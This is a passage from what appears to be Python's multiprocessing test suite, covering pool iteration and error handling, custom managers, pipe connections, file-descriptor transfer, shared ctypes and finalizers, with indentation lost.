# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.time()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.time() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# If the manager process exited cleanly then the exitcode
# will be zero. Otherwise (after a short timeout)
# terminate() is used, resulting in an exitcode of -SIGTERM.
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
manager.shutdown()
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
heap._lock.acquire()
self.addCleanup(heap._lock.release)
for L in list(heap._len_to_seq.values()):
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
